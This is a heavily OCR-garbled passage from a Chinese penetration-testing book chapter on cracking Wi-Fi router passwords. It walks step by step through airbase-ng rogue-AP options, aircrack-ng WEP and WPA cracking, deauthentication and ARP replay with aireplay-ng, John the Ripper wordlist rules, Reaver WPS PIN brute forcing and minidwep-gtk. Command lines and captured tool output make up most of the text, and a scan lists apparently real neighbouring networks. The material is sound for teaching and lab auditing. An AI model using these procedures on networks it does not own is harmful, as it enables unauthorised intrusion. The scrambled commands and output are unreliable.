-K: 只 使 用 旧 的 KoreK 攻 击 (pre- 
PTW) 。 


禁用 一 个 攻击 方法 〈]1 一 


8.2.5 airbase -ng 工具 


airbase-ng 作 为 多 目标 的 工具 ， 通 常 将 
自己 伪装 成 AP 攻击 客户 端 。 该 工具 的 功能 
丰富 多 样 ， 常 用 的 功能 特性 如 下 : 

e 实施 caffe-latte WEP 攻 击 。 

e 实施 hirte WEP 客 户 端 攻击 。 

e 抓 取 WPA/WPA2 认 证 中 的 handshake 

数据 包 。 
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e 伪装 成 AD-Hoc AP。 

e 完全 伪装 成 一 个 合法 的 AP。 

e 通过 SSID 或 者 和 客户 端 MAC 地 址 进 

e 操作 数据 包 并 且 重 新 发 送 。 

e 加 密 发 送 的 数据 包 以 及 解密 抓 取 的 

数据 包 。 

该 工具 的 主要 目的 是 让 客户 端 连 接 上 
伪装 的 AP， 而 不 是 阻止 它 连 接 真实 的 AP， 
当 airbase-ng 运 行 时 会 创建 一 个 tap 接 口 ， 这 
个 接口 可 以 用 来 接收 解密 或 者 发 送 的 加 密 
数据 包 。 

一 个 真实 的 客户 端 会 发 送 probe re- 
quest， 在 网 络 中 ， 这 个 数据 帧 对 于 绑 定 客 
户 端 到 伪装 AP 上 具有 重要 的 意义 。 在 这 
种 情况 下 伪装 的 AP 会 回应 任何 的 probe re- 
quest。 建 议 最 好 使 用 过 滤 以 防止 附近 所 有 
的 AP 都 会 被 影响 

下 图 为 airbase-ng 工 具 的 命令 格式 及 参 
数 说 明 。 


TIONS> replay TNTerTaces 


出 


主要 参数 介绍 如 下 : 

e@ -a: 设置 软 AP 的 ssid。 

。 -i: 接口 ， 从 该 接口 抓 取 数据 包 。 

e -w: 使 用 WEP key 加 密 / 解 密 数 
据 包 。 

e -h MAC: 源 MAC 地 址 〈 在 中 间 人 攻 
击 时 的 MAC 地 址 ) 。 
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e -f disallow: 不 容许 某 个 客户 端的 
MAC 地 址 〈 默 认为 容许 ) 。 

e -W 0|1: 不 设置 WEP 标 志 在 beacon 

(默认 容许 ) 。 

-q: 退出 。 

-V (--verbose) : 显示 进度 信息 。 

-A: ad-hoc 对 等 模式 。 

-Y inloutlboth: 数据 包 处 理 。 

-c: 信道 。 

-X: 隐藏 ESSID。 

-s; 强制 的 将 认证 方式 设 为 共享 密 

钥 认 证 。 

e -S: 设置 共享 密 钥 的 长 度 ， 默 认为 
128bit。 

e -L: caffe-Latte 攻 击 。 

e -N: hirte 攻 击 ， 产 生 ARP request 
against WEP 客 户 端 。 

e -xnbbps: 每 秒 的 数据 包 。 

e -y: 不 回应 广播 的 probes request 
(只 回应 携带 SSID 的 单 播 probe 
request) 。 

e -Z: 设置 WPA1 的 标记 ，1 为 WEP40， 
2 为 TKIP，3 为 WRAP，4 为 CCMP， 
5 为 WEP104〔 即 不 同 的 认证 方 


式 〗s 

e -Z: 和 -z 作 用 一 样 ， 只 是 针对 
WPA2。 

e -V: 欺骗 EAPOL，1 为 MD5，2 为 
SHA1，3 为 自动 。 


ee -F xxx: 将 所 有 收 到 的 数据 帧 放 到 文 
件 中 ， 文 件 的 前 组 为 xxx。 

e -P: 回应 所 有 的 probes request， 包 括 
特殊 的 ESSID 。 

e -I: 设置 beacon 数 据 帧 的 发 送 间隔 ， 
单位 ms。 

e@ -C: 开启 对 ESSID 的 beacon。 

下 图 为 Airbase-ng 工 具 的 文件 选项 

说 明 。 
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Fitter optronss 


--bssid MAC : BSSID to filter/use 
--bssids file  : read a list of BSSIDs out of that file 
--client MAC : MAC of client to filter 


-~-clients file : read a list of MACs out of that file 
--essid ESSID 


--essids file 


: specify a single ESSID (default: default) 
: read a List of ESSIDs out of that file 


主要 参数 介绍 如 下 : 

® --bssid MAC|: 

® --bssids file: 

e --client MAC: 让 制定 MAC 地 址 的 客 
户 端 连接 。 

e --clients file: 让 文件 中 的 MAC 地 址 
的 客户 端 可 以 连接 上 。 

e --essid ESSID: 创建 一 个 特殊 的 
ESSID 。 

® --essids file: 


ESSID 来 过 滤 。 


使 用 工具 破解 无 线路 由 器 
密码 


无 线路 由 器 密码 的 安全 强度 是 进入 
无 线 网 络 的 关键 ， 要 想 从 无 线路 由 器 进入 
内 网 ， 就 必须 知道 无 线路 由 器 的 密码 ， 使 
些 破 解 工 具 可 以 破解 出 无 线路 由 器 的 
密码 。 


根据 AP 的 MAC 来 


根据 文件 中 的 BSSID 来 


根据 一 个 文件 中 的 


8.3 


使 用 aircrack-ng 破 解 WEP 密 码 
使 用 aircrack-ng 工 具 可 以 破解 WEP 加 密 


方式 的 无 线路 由 密码 。 破 解 之 前 ， 首 先 登录 


无 线路 由 器 ， 在 “无 线 设 置 ” 中 将 “无 线 安 
全 设置 ”设置 成 WEP 加 密 ， 如 下 图 所 示 。 
修改 加 密 方式 后 需 重启 路 由 器 才能 生效 。 


电 WEF 

认证 类 型 : EEFR 

是 P 密 钥 格式 : ASC 呆 

密 锡 选择 是 F 密 钥 室外 类 型 
密 钥 1: 时 1234567890123 128 位 v 
密 钥 2: 葵 用 " 
密 钥 3: 条 用 
密 钥 4: EE 
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破解 WEP 密 码 的 具体 操作 步骤 如 下 : 
[step 图 执行 airmon-ng strat wlan0 命 令 ， 启 
动 网 卡 并 进入 monitor 模 式 ， 下 图 为 执行 
效果 。 


FaaaaaG 


py: viane 


Teacse211 m 
(eacae211 


[step 图 执行 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
wlan0mon 命 令 ， 启 动 数 据 抓 包 功能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


tH IU Elapsed: 6 5 1U 2018-10-18 04108 
Bss1D PR RX Beacons soata, 4/s CH HB EC CIPHER AUTH ESSID 
1C:FA:68:01:2F:08 -8 48 25 3 日 1 5d4e, WEP WEP Test-001 
Bss1D STATION PM Rate Lost rranes Probe 


crAi6B:612r308 nci60:cpib6irE:C -1l2 9 -ee © 7 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


TREEUOO 
1C:FA:68:01:2F:08) on channel 1 


coge SA fbE: en cn rod Pe es) | 01ss Acka 


[step 轩 此 时 会 抓 取 到 AP 与 STA 关 联 时 的 密 铀 
流 ， 下 图 为 抓 取 的 密 铀 流 。 


BssID STATION 


ac:FA:68:61:2F:08 OC:6D:CD:66:FE:C8 14 0-9 22 1s9 


[sep 图 执行 ls 命令 ， 查 看 当前 目录 可 以 发 现 
有 一 个 .xor 结 尾 的 文件 ， 这 个 文件 保存 着 


STA 关 联 AP 的 密 钥 流 ， 如 下 图 所 示 。 


FootekalL: -FUs 
bp 


ee Oa tt 


Estee 加 利用 XOR 文 件 与 AP 建立 关联 ， 一 
旦 获取 到 密 钥 流 便 可 以 将 任意 主机 与 AP 
进行 关联 ， 使 用 aireplay-ng -1 < 间隔 时 
间 > -e <ESSID> -y < 密 钥 流 文件 > -a <AP- 
MAC 地 址 > -h < 需要 建立 关联 的 MAC 地 
址 > wlan0mon 命 令 ， 可 以 使 本 机 与 AP 建立 
关联 ， 如 下 图 所 示 。 
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[Foot Faireplay-ng -1 66 -e Test-66T -y wep-B1-1C-FA-68-01-2F-8 x0r -a IC:FA:G8: 
01:2F:88 -h EB-4E-05-28-AE-46 wlanonon 
ba;35:31 Waiting for beacon trane (BSSID: 1C:FA:68:01:2F:08) on channel 1 


04;35:31 Sending Authentication Request (shared Key) [ACK] 

Ba:35:31 Authentication 1/2 successfal 

p4135:31 Sending encrypred challenge. [ACK] 

(04:35:31 Authentication 2/2 successfal 

|a:35:31 Sending Assoclation Request [ACK] | 
B4:35:31 Association successtul :-) (AID: 1) 


[step 国 执行 ARP 重 放 收集 IV 数 据 ， 执 行 ARP 
重 放 需 要 先 获取 一 个 有 效 ARP 数 据 ， 本 机 
只 是 与 AP 建立 了 关联 并 不 能 进行 通信 ， 所 
以 还 需要 抓 取 一 个 有 效 ARP 通 信 ， 此 时 可 
以 执行 aireplay-ng -3 -b <AP-MAC 地 址 > -h 
< 本 机 MAC 地 址 > wlan0mon 命 令 ， 如 下 图 
所 示 。 


FaaEaRNUE-A GIFEPUGY ng “3b CHFATGB O12FrO8 -h EH-4E-06720-AE-45 WIAnOnGN 
4:39:49 Waiting for beacon frame (B551D; 1C:FA:68:01:2F:08) on channel 1 


eg ARP requests in replay arp-1615-043949.cap 
en 
| 
step 图 再 次 解除 AP 与 STA 关 联 ， 触 发 真实 


的 ARP 数 据 包 ， 产 生 以 replay_arp 开 头 的 文 
件 ， 如 下 图 所 示 。 


ln-014337.cap 。 wep-9l.cap 
wep-0l csy 

wep-01 Kismet csv 

-ACPA- G0-01-21-08.x0r wep-0l.Kismet netxnl 


plny arp-1918-012700, cap 
raplay arp- 1918-013325. cap wep’ 


[图 当 产生 这 个 ARP 合 法 数据 包 后 ， 便 会 
开始 真正 的 ARP 重 放 ， 如 下 图 所 示 。 


oor nreplny-ng -3 -b ICHFATGD OL 2rd -ED-9E-96-78-RE-96 LO 
[04:44:21 Waiting for be D+ 1C:FA:68:01:2F:08) on channel 1 
Saving ARP requests in reptay_arp-1918-944422.cap 

vou shoutd also start atrodump-ng to capture replies 

[Read 10658 packets (got 2419 ARP requests and 3666 ACKs), sent 4252 packets.. 


{499 pps) 


[step 国 尽量 多 的 收集 TV， 收 集 的 IV 值 越 多 越 
容易 破解 出 密码 ， 如 下 图 所 示 。 


cH IU Elapsed: 34 nlns 1 2010-10-18 02:07 J{ 148 bytes Keystrean: 1C:FA:60:O1:2F:08 


ssTD PR Rx Beacons woata, Ws CH Ma ENC CIPHER AUTH ESSID 


CFA:6B:01:2F:08 © S54 12399 144526 9 1 Se, WEP WEP SKA Test-e91 


5sTD STATION Porn Rate Lost 。 Franes Probe 
IC:FA:G8:01:2F:00 EN:4E:06:28:AE:46 0 日 - 1 0 1319964 
IC:FA:68:01:2F100 DC6D:CD:66:FE:CB -2 le-6 0 3194 Test-001 


[Sep 加 使 用 aircrack-ng 工 具 破 解密 码 ， 该 
密码 为 KEY FOUND!。KEY FOUNDI 后 
面 方 括号 中 是 密码 的 十 六 进 制 形 式 ， 之 后 
ASCII: 后 面 便 是 常用 的 字符 串 密码 ， 如 下 
图 所 示 。 


Alrerack-ng 1.4 


[08:00:88] Tested S11 keys (got 142782 TVs) 


Ka depth byte(vore) 
9 4/ 7 50(157449) 28(155648) 59(155392) 9C154368) BE[154112) 
1 2/ 1 76(159498) ED(156928) 53(155572) D2(155416) 78(155136) 
2 a/ 1 96(199168) 27(158976) 92(158976) 7C(157696) BL(157184) 
3 59/ 3 F6(147455) 20(146944) 3E(146944) 55(145944) 65[146944] 
4 2/ 5 ASll60009) 58(159488) C4(158376) 3C(156416) a4(155648) 


KEY FOUND! [ 31:32:33:34:35:36:37:39:39:39:31:32:33 ] (ASCII: 1234567899123 ) 
Decrypted correctly: 198% 


移 提 示 : 一 旦 收集 到 足够 多 的 IV， 那 么 
破解 WEP 密 码 的 速度 就 非常 快 ， 所 以 采用 
WEP 加 密 是 不 安全 的 。 


8.3.2 使 用 aircrack-ng 破 解 WPA 密 码 


破解 WPA 与 WEP 不 同 ，WEP 需 要 收集 
大 量 IV 数 据 ， 而 WPA 只 要 抓 取 四 次 握手 信 
息 即 可 ， 但 是 如 果 字 典 文件 中 没有 密码 是 
破解 不 出 来 的 。 


1. 认识 字典 文件 


Kali 中 本 身 自 带 了 一 些 字典 文件 ， 查 看 
自 带 字典 文件 的 方法 如 下 。 

(1) /user/share/john 目录 下 的 password. 
lst 字典 文件 ， 如 下 图 所 示 。 


Fo UT 
nm .oh 


区 用品 


umb16, Conf Narelogic.cont = lowerspace. chr ppernum chr 
wmapi dumb32, conf anman'chr password, st Wehr 
pha -chr yamlcvconf atlnl chr regex alphnbets, conf 

sc chr ymalc TUat sse formats.conf ln ascil.chr repeats16,Conf 

rmi john Aover .chr repeats32 con 

gits.chr john. local.conf Mowernun. chr upper. chr 


(2) /usr/share/wfuzz/wordlist/general 日 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


FoatBkaUis7usr7sRare7wfuzz7worq[UIStJgeneratg TS -Ua 

总 用 旺 488K 

drwxr-xr-x 2 root root 4.0K 16 月 8 69:58 

drwxr-xr-x 8 root root 4.0K 8 月 21 66:52 

- root root 2.5K 3 月 25 2918 admin-panels.txt 
root root 22K 3 月 25 2918 big.txt 

root root 1.2K 3 月 25 2918 catala,txt 

root root 6.4K 3 月 25 2918 comnon,txt 

root root 278 3 月 25 2918 euskera.txt 

root root 141 3 月 25 2918 extenslons comnon.txt 
root root 238 3 月 25 2918 http methods.txt 
root root 12K 3 月 25 2918 medium,txt 

root root 491K 3 月 25 2918 megabeast,txt 

root root 244 3 月 25 2918 mutations comnen.txt 
root root 2.1K 3 月 25 2918 spanish.txt 

root root 79 3 月 25 2918 test.txt 


EEEEEEEE 


se 


(3) /usr/share/wfuzz/wordlist/Injections 
目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wfuzz/wordlist/Injections# ls -lah 
总 用 量 46K 


drwxr-xr-x 2 root root 4.9K 16 月 8 99:58 

drwxr-xr-x 8 root root 4.9K 8 月 21 96:52 

rw-r--r-- 1 root root 11K 3 月 25 2618 All attack.txt 
-rw-r--r-- 1 root root 59 3 月 25 2918 bad chars.txt 
rw-r--r-- 1 root root 1.6K 3 月 25 2618 SQL.txt 
-rw-r--r-- 1 root root 3.4K 3 月 25 2618 Traversal.txt 
-rw-r--r-- 1 root root 1.5K 3 月 25 2618 XML.txt 
-rw-r--r-- 1 root root 2.4K 3 月 25 2618 XSS.txt 


(4) /usr/share/wfuzz/wordlist/others 目 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wruzz/wordlist/others# Ls -Lah 
总 用 量 72K 

ldrwxr-xr-x 2 root root 4.6K 16 月 

drwxr-xr-x 8 root root 4.6K 8 月 

== 证 

1 


8 699:58 

21 96:52 

25 2618 common pass.txt 
25 “2618 names .txt 


-rw-r- root root 418 3 月 
-rw-r--r-- 1 root root 59K 3 月 
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(5) /usr/share/wfuzz/wordlist/stess 目录 下 
的 字典 文件 ， 如 下 图 所 示 。 


区 Ts -Tah 


总 用 量 184K 
root 
root 


root 
root 


4.6K 16 月 8 99:58 


4.6K 8 月 21 96:52 


root root 189 3 月 25 2018 alphanun case extra.txt 
root root 124 3 月 25 2818 alphanun case.txt 

root root 52 3 月 25 2018 char.txt 

raot root 1.5K 3 月 25 2818 doble uri hex.txt 

root root 155K 3 月 25 2018 test ext.txt 

raot root 1.6K 3 月 25 2918 uri hex.txt 


(6) /usr/share/wfuzz/wordlist/webservic- 


es 目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wfuzz/wordlist/webservices# ls -Lah 


总 用 量 16K 

drwxr-xr-x 2 root root 4.0K 16 月 8 69:58 

drwxr-xr-x 8 root root 4.9Kk 8 月 21 96:52 

-rw ~ 1 root root 453 3 月 25 2918 ws-dirs.txt 
-rw-r--r-- 1 root root 111 3 月 25 2918 ws-files.txt 


(7) /usr/share/wfuzz/wordlist/vulns 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 


rootakall: /usr7/share/ WTuzz/Wwordlist/vulns# ts -Ltah 


总 用 量 446K 
drwxr-xr-x 2 root root 4.0K 16 月 8 69:58 
drwxr-xr-x B root root 4.0K 3 月 21 66:52 
-rw-r--r-- 1 root root 239 3 月 25 2918 apache.txt 
-- 1 root root 198k 3 月 25 2918 cgls.txt 
-r-- 1 root root 706 3 月 25 2918 coldfusion.txt 
r-- 1 root root 74K 3 月 25 2918 dirTraversal-nix.txt 
-r-- 1 root root 71K 3 有 25 2918 dirTraversal.txt 
--r-- 1 root root 72K 3 月 25 2918 dirTraversal-win.txt 
r-- 1 root root 3.1K 3 月 25 2918 domino.txt 
--r-- 1 root root 15K 3 月 25 2918 fatwire pagenames.txt 
-r- 1 root root 863 3 月 25 2618 fatwire.txt 
r-- 1 root root 383 3 月 25 2918 frontpage.txt 
ry-r-r-- 1 roor root 9485 3 2 Zl 115.UXC 
-rwv-r--r-- 1 root root 365 3 月 25 2918 iplanet.txt 
rw-r--r-- 1 root root 306 3 月 25 2918 jrun.txt 
ry-r--r-- 1 root root 155 3 有 25 2918 metvare.txt 
-rw-r--r-- 1 root root 295 3 月 25 2918 oracte9i.txt 
ru-r--r-- 1 root root 16k 3 月 25 2918 sharepoint.txt 
rw-r-r-- 1 root root 571 3 有 25 2918 sql_ inj.txt 
1 root root 976 3 月 25 2918 sunas.txt 
1 root root 220 3 月 25 2918 tests.txt 
1 root root 1.8K 3 月 25 2918 tomcat.txt 
-- 1 root root 536 3 月 25 2918 vignette.txt 
ru-r--r-- 1 root root 2.4K 3 月 25 2918 weblogic.txt 
-rw-r--r- 1 root root 7.4K 3 月 25 2918 websphere.txt 


(8) /usr/share/wordlist 目录 下 的 字典 文 
件 ， 如 下 图 所 示 。 


ar/abareysqtwapytxx/verdtias txt 
lss ro 


oot 25 BH Xl 00:32 aoc > 


(9) /usr/share/wordlist 目录 中 有 一 个 压 
缩 文件 rockyou.txtgz。 其 中 也 包含 一 个 字 
上 典 文件 解压 缩 ， 如 下 图 所 示 。 


root@kali: /usr/share/wordlists# gunzip rockyou.txt.gz 
Iroot@kali:/usr/share/wordlists# ls 

air dnsmap .txt fern-wifi nmap.lst 
Mirbuster fasttrack.txt nerasploit rockyou.txt wfuzz 
Iroot@kali: /usr/share/wordlists# cat rockyou.txt | wc -1 
14344392 


sqlnap. txt 


2. 破解 WPA 密 码 
破解 文件 之 前 ， 首 先 需要 设置 无 线路 
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由 器 的 加 密 方 式 ， 设 置 方法 为 : 首先 登 
录 无 线路 由 器 ， 在 “无 线 设置 ”中 将 “无 
线 安全 设置 ”设置 成 WPA 加 密 ， 如 下 图 
所 示 。 修 改 加 密 方式 后 需 重 启 路 由 才能 
生效 。 


wpA-FSE/NNPA2-PSK 


Mi: [EEE 
加 至 革 去; 生动 
TS 琵 码 : Password 
《8-63 个 ASCIIT 码 字符 或 8-64 个 十 六 进 制 字符 ) 
RENAN 6400 


《单位 为 秒 ， 最 小 值 为 30， 不 更 新 则 为 0) 


破解 WPA 密 码 的 具体 操作 步骤 如 下 : 
使 用 airmon-ng strat wlan0 命 令 启 动 网 
卡 并 进入 monitor 模 式 ， 如 下 图 所 示 。 


pr intertace Driver chipset 


py vane rt2sseush Ralink Technology, Corp. RT2879/RT3070 


macs9211 nonitor mode vif enabled for Lphyljwtang on Lphyljvtanenon) 
fmacg9211 station mode vif disabled for [phy1]wtang) 


[step 图 使 用 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
wlan0mon 命 令 ， 启 动 数据 抓 包 功能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


CUGCCRCOTET 


23727 


lass1D Pum XO Beacons 0ata, w/s CH Ma ENC CIpHER AUTH ESSID 


1C:FA:68:01:2F:68 1 53 459 16 0 1 270 WpA2 ChP psk Test-001 
less1D STATION Pum Rate Lost Frames probe 
1C:FA:68:61:2F:68 DC:6D:CD:66:FE:CE 1 8 -6 1 1 


[step 图 如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


[rootakall:-e airepiay-n9 -9 1 -a 1CFA:68;01:2F:08 -CDCI6DYCD66YFE:CE wanonon 
le4:15:06 waiting for beacon trane (BSSID: 1C:FA:68:91:2F:98) on channel 1 
le4:15:07 Sending 64 directed DeAuth (code 7). STHAC: [DC:6D:CD:66:FE:CB] [ 9|55 Acks] 


step 园 当 抓 取 到 AP 与 STA 关 联 时 的 四 次 握手 
信息 ， 下 图 会 给 出 相应 的 提示 信息 


So 
[TIT lapsed: 3 mins 11 2018-10-18 23130 WA ardshahe ICrFAr68101r2Fr On 


assID PiR Rx Beacons #0ata, #/s CH Me ENC CIPHER AUTH EssIO 


esFA:8:01:2F:98 1 39 1l16 83 2 1 270 WPA2 cmp Psk Test-001 


assmp STATION pm Rate Lost franes Probe 


IC:FA:68:01:2F:88 DC:6D:CD:66:FE:CB © le- ge 1912 


Estee 图 使 用 aircrack-ng -w < 字典 文件 > 
wpa-01.cap 命 令 ， 即 可 破解 出 WPA 密 码 ， 如 
下 图 所 示 。 可 以 看 到 每 秒 筛选 2174 个 密码 
文件 ， 如 果 字 典 中 存在 密码 文件 一 定 会 破 


92 Test-901 


解 出 来 ， 这 里 获取 的 密码 为 Password。 


[ee:69:06] 172/647 keys tested (2174.95 k/s) 


Time left: 9 seconds 26.58% 


KEY FOUND! [ Password ] 


: B2 94 7A FB 6C 35 F5 53 DD BF 7F 96 4A 456 17 AB 
D1 43 4A 74 D1 42 39 68 66 26 69 5C D5 87 BD 17 


Master Key 


: S51 FB B2 JC FA 78 1F gD ES B4 47 12 E9 68 OA @8 
46 69 45 F9 EQ 15 18 EA 45 34 D3 D2 E9 6F DC 2E 


Transient Key 


FB 9A FE 82 59 92 77 D5 F1 94 89 99 99 99 69 66 
‘90 6g 60 90 00 99 99 90 66 66 90 09 99 99 99 ee 


EAPOL HMAC : 3E 78 E2 FA C6 9D 53 78 F@ 95 8F F7 EC 7C 7B A2 | 


8.3.3 ”使 用 JTR 工 具 破 解 WPA 密 码 


JTR (John the Ripper) 是 一 个 快速 的 
密码 破解 工具 ， 用 于 在 已 知 密 文 的 情况 下 
尝试 破解 出 明文 的 密码 软件 ， 支 持 目前 大 
多 数 的 加 密 算法 。 

使 用 JTR 〈John The Ripper) 破解 密码 
的 操作 步骤 如 下 : 
打开 配置 文件 并 搜索 List.Rules: 
Wordlist 字 段 ， 如 下 图 所 示 。 


# Wordlist mode rules 
[List.Rules:Wordlist] 
# Try words as they are 


## Lowercase every pure alphanumeric word 
-EC >3 !?X 1LQ 

# 轴 Capitalize every pure alphanumeric word 
-C (?a >2 !?X cQ 


调整 到 ListRules:Wordlist 字 段 的 结尾 
处 ， 加 入 “S$[0-9] $[0-9] $S[0-9] $S[0-9]” 字 
段 ， 如 下 图 所 示 ， 这 样 便 可 以 修改 密码 生 
成 规则 。 

-[:c] <* >2 !?A \pl[1lc] M [PI] 0 

# Try the second half of split passwords 

eh 

-SC Xx** MLO 

$[9-9]$[9-9]$[6-9]$[9-9] 

# Case toggler for cracking MD4-based NTLM hashes 
# given already cracked DES-based LM hashes. 


# Use --rules=NT to use this 
[List.Rules:NT] 


[step 图 使 用 john --wordlist=< 密 码 文 件 > 
--rules --stdout 命 令 ， 可 以 通过 相应 的 规则 
生成 密码 ， 如 下 图 所 示 。 其 中 --wordlist 是 
读 取 密码 文件 ; --rules 对 该 文件 使 用 规则 ; 
--stdout 进 行 显示 。 
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root@kali:-# john --wordlist=dd.txt --rules --stdout 
1559992 
1566992 
1361234 
1321234 


4p 6:69:699:699 196.96s (2918-19-19 695:14) 49.699p/5 1321234 
[step 园 使 用 john --wordlist=dd.txt --rules 
--stdout | aircrack-ng -e Test-001 -w - wpa-01.cap 
命令 ， 配 合 aircrack-ng 进 行 密码 破解 。 下 图 
为 执行 效果 ， 可 以 看 出 密码 为 Password666。 


80:68:00] 4 keys tested (21.53 k/s) 


Current passphrase: Password666 


: AB 3D B3 21 F4 86 8F 07 7D CE 6E E9 33 75 4E 98 
66 34 78 83 48 EA 70 A@ DA F9 A4 65 81 18 76 6B 


Master Key 


Transient Key : El D9 12 9A 10 34 8D 28 73 D4 38 AE BB BD 1E 9D 
88 53 E7 DD 85 81 Fa 28 C9 87 36 63 AB 41 65 63 
59 75 9D 96 68 69 3F 81 BB SF 29 55 86 58 3C FA 
BA F4 F5 F4 CC AE 64 FD 3E 3E 58 1A OD E8 DC a8 


EAPOL HMAC ~ : 93 46 62 15 49 1F 11 48 9E A5 9A 98 F2 4C 72 42 


Passphrase not in dictionary 


8.3.4 使 用 Reaver 工 具 破 解 WPS 密 码 


Reaver 工 具 是 目前 流行 的 无 线 网 络 攻击 部 举 


工具 ， 它 主要 针对 的 是 WPS 漏 洞 。Reaver 
工具 会 对 WiFi 保 护 设置 (WPS) 的 注册 PIN 
码 进行 暴力 破解 攻击 ， 并 尝试 恢复 出 WPA/ 
WPA2 密 码 。 

使 用 Reaver 工 具 破解 密码 的 操作 步骤 
如 下 : 
[sep 回 使 用 reaver 命 令 ， 查 看 reaver 工 具 的 帮 
助 信 息 ， 下 图 为 所 需 参 数 。 


reerekati:-e reaver 


Reaver v1.6.5 miFl protected setup Attack Toal 
[copyrignt tc] 2011, Tactical Network Solutions, cralg Heffner <cheffneratacnetsot con> 


IReauired areumenrs 
1, -interface=cvtan 


4, Nane of the nonitor-node interface to use 
-b, bssid=enac> 


BSSI0 of the target AP 


将 网 卡 设置 成 monitor 模 式 ， 寻 找 支 
持 WPS 的 AP， 使 用 wash -U -i wlan0mon 命 
令 。 下 图 为 执行 效果 。 其 中 -U 是 表示 以 
UTF-8 字 符 编码 进行 显示 ，-i 是 具体 使 用 的 
网 卡 接 口 。 


root@kali:-# wash -U -i wLangmon 
dBm WPS Lck Vendor ESSID 
-59 2.6 No RalinkTe 小米 共 享 WiFl De68 
-57 2.8 No Broadcom Chinanet-KTJK9F 
59 2.0 No RalinkTe lfwx 
57 2.9 No Unknown wangyangyang 
-61 2.6 Wo Unknown TP-LINK_EAD554 
-59 2.6 No 主 接 93- 
-61 1-6 Wo RatinkTe ChinaNet-TKae 
61 2.6 No RalinkTe ChinaNet-nkkk 
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侈 提 示 : 还 可 以 使 用 airodump-ng 这 个 工具 
来 寻找 支持 WPS 的 AP， 使 用 airodump-ng 一 
wps wlan0mon 命 令 ， 同 样 可 以 寻找 到 支持 
WPS 功 能 的 AP， 下 图 为 执行 效果 。 


EEC 


Ch SII Elapsed: 39 s J{ 2818-18-28 00:55 


ss10 Pm Beacons suata, #/s 
F41831CD133169173 。 20 的 日 
1CYFAz6819112F308 “39 但 日 
68:A317C:81485 -36 4 日 8 
4368:Aa37C:B1381 38 3 a 8 
E4368:A37C:EF3FS -39 3 日 
全 :6:A32TC:EF:F2 办 2 DD 


破解 PIN 码 ， 使 用 reaver -i wlan0mon 
-b <AP-MAC 地 址 > -vv -c 3 命令 ， 其 中 -vw 是 
显示 详细 信息 ，-c 选 择 信道 ， 如 下 图 所 示 。 
每 次 随机 选择 一 个 PIN 码 进 行 发 送 。 

+] Trying pin "33335674" 

+] Sending authentication request 

+] Sending association request 

+] Associated with 1C:FA:68:81:FB:EA (ESSID: TP-LINK 81FBEA) 
+] Sending EAPOL START request 

+] Received identity request 

+] Sending identity response 

+] Received M1 message 

+] Sending M2 message 

+] Received M3 message 

+] Sending M4 message 

+] Received WSC NACK 

+] Sending WSC NACK 

+] 0.05% complete @ 2018-11-04 23:55:33 (28 seconds/pin) 


人 移 提 示 : 在 破解 的 过 程 中 ， 如 果 加 入 -K 1 
参数 ， 可 以 快速 破解 出 AP 的 PIN 码 。 


[step 园 获取 到 PIN 码 后 ， 可 以 通过 PIN 码 获 
取 密 码 ， 这 时 可 以 使 用 reaver -i wlan0mon 
-b<AP-MAC 地 址 > -vv -p <PIN 码 > 命令 来 获 
取 密 码 ， 这 里 获取 的 密码 为 Password， 如 下 
图 所 示 。 


[FJ] Received MI nessage 

[+] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 nessage 

[+] Received M5 message 

[+] Sending M6 message 

[+] Received M7 message 

[+] Sending WSC NACK 

[+] Sending WSC NACK 

[+] Pin cracked in 4 seconds 
[+] WPS PIN: '35169857 

[+] WPA PSK: “Password 

[+] AP SSID: 'Test-661 

[+] Nothing done, nothing to save 


8.4 ”使 用 CDlinux 系 统 破解 无 
线路 由 器 密码 


CDlinux 系 统 中 自 带 有 许多 破解 工具 ， 
如 mimidwep-gtk、FeedingBottle、Inflator 
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等 ， 使 用 这 些 工 具 可 以 破解 无 线路 由 器 的 
密码 。 


8.4.1 使 用 minidwep-gtk 破 解 WEP 
密码 

使 用 minidwep-gtk 破 解 WEP 密 码 需 要 以 

下 几 个 步骤 : 

[step 图 双 去 CDlinux 桌 面 minidwep-gtk 图 标 ， 

如 下 图 所 示 。 


[step 图 启动 minidwep-gtk 首 先 会 弹出 一 个 警 
告 信息 框 ， 如 下 图 所 示 。 阅 读 完 交 告 信息 
后 单 击 OK 按钮 。 


本 软件 是 家 用 无 线路 由 器 安全 审计 之 工具 
切 勿 用 于 非法 行为 
盗用 他 人 无 线 网 络 涉嫌 违法 


丢弃 WEP 加 密 ， 使 用 WPA2 加 密 
关闭 路 由 WPS 


[Sor | 


下 图 为 启动 后 的 minidwep-gtk， 左 侧 
的 “无 线 网 卡 ” 中 可 以 看 到 接 入 的 无 线 网 
卡 ; “信道” 可 以 选择 对 那 种 信道 进行 打 
描 ，“ 加 密 方 式 ” 可 以 选择 针对 哪 种 加 密 方 
式 进 行 破解 。 


Ea Ac 和。 可 有 信 而 NE。 PMAC 
es 和 摘 
on 
| 
信 进 mz | 
= 
加 更 方式 局 动 
www | 
jE Ee 
加 T1106 如 > 中 | 
- 3 停止 
ea | 
Pe 
VS 数量 : 


侈 注意 : 如 果 “ 无 线 网 卡 ” 中 没有 检测 到 
无 线 网 卡 ，minidwep-gtk 软 件 会 给 出 提示 ， 
此 时 可 以 检查 无 线 网 卡 是 否 插入 并 可 用 。 


step 回 切换 加 密 方式 为 WEP 并 单 击 “ 扫 描 ?” 
